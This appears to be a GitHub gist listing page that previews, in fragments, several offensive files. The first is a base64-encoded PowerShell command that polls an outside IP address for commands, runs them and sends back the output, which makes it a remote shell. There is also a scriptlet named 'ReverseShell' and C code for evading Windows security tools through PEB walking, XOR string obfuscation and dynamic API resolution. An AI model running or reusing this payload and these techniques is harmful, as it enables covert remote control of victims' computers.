This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
powershell -e JABzAD0AJwAxADUAOQAuADYANQAuADEANgA4AC4AMQAzADUAOgA4ADAAOAAwACcAOwAkAGkAPQAnAGUAZgA5AGQAYgA1ADMAOAAtADIANQBiADIAYgA3ADAANQAtAGMAMQAyAGUAMwBhADAANAAnADsAJABwAD0AJwBoAHQAdABwADoALwAvACcAOwAkAHYAPQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACAALQBVAHIAaQAgACQAcAAkAHMALwBlAGYAOQBkAGIANQAzADgAIAAtAEgAZQBhAGQAZQByAHMAIABAAHsAIgBYAC0AYwA3ADEAMQAtAGIAYgA0ADUAIgA9ACQAaQB9ADsAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQB7ACQAYwA9ACgASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AMgA1AGIAMgBiADcAMAA1ACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtAGMANwAxADEALQBiAGIANAA1ACIAPQAkAGkAfQApAC4AQwBvAG4AdABlAG4AdAA7AGkAZgAgACgAJABjACAALQBuAGUAIAAnAE4AbwBuAGUAJwApACAAewAkAHIAPQBpAGUAeAAgACQAYwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAgAC0ARQByAHIAbwByAFYAYQByAGkAYQBiAGwAZQAgAGUAOwAkAHIAPQBPAHUAdAAtAFMAdAByAGkAbgBnACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAHIAOwAkAHQAPQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
description="ReverseShell" | |
progid="ReverseShell" | |
version="1.00" | |
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
#include "helpers.h" | |
#pragma comment(linker, "/entry:WinMain") | |
typedef DWORD (WINAPI * WaitForSingleObject_t)( |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include "PEstructs.h" | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
#include "helpers.h" | |
HMODULE WINAPI hlpGetModuleHandle(LPCWSTR sModuleName) { | |
// get the offset of Process Environment Block |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
void XOR(char * data, size_t data_len, char * key, size_t key_len) { | |
int j; | |
j = 0; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
int main(void) { | |
HMODULE hKernel32 = GetModuleHandle("kernel32.dll"); | |
HMODULE hNtdll = GetModuleHandle("ntdll.dll"); | |
DWORD oldprotect; | |
// Function pointers typedefs |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
#include <iostream> | |
#define KEY 'A' // our key | |
// Function to encrypt/decrypt strings | |
void XOR(LPSTR data, int data_len) { | |
for (int i = 0; i < data_len; i++) { | |
data[i] ^= KEY; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
#include <iostream> | |
int main() { | |
// Load the user32.dll library | |
HMODULE user32Dll = GetModuleHandle(L"user32.dll"); | |
// Define a function pointer for MessageBoxW | |
typedef int (WINAPI* MessageBoxWFunc)( | |
HWND hwnd, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
HMODULE GetModuleHandleW( | |
[in, optional] LPCWSTR lpModuleName // name of the loaded module , DLL or exe e.g user32.dll | |
); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
FARPROC GetProcAddress( | |
[in] HMODULE hModule, // handle to DLL module containing the function we are looking for | |
[in] LPCSTR lpProcName // function name we are looking for. Can also be an ordinal value | |
); |
NewerOlder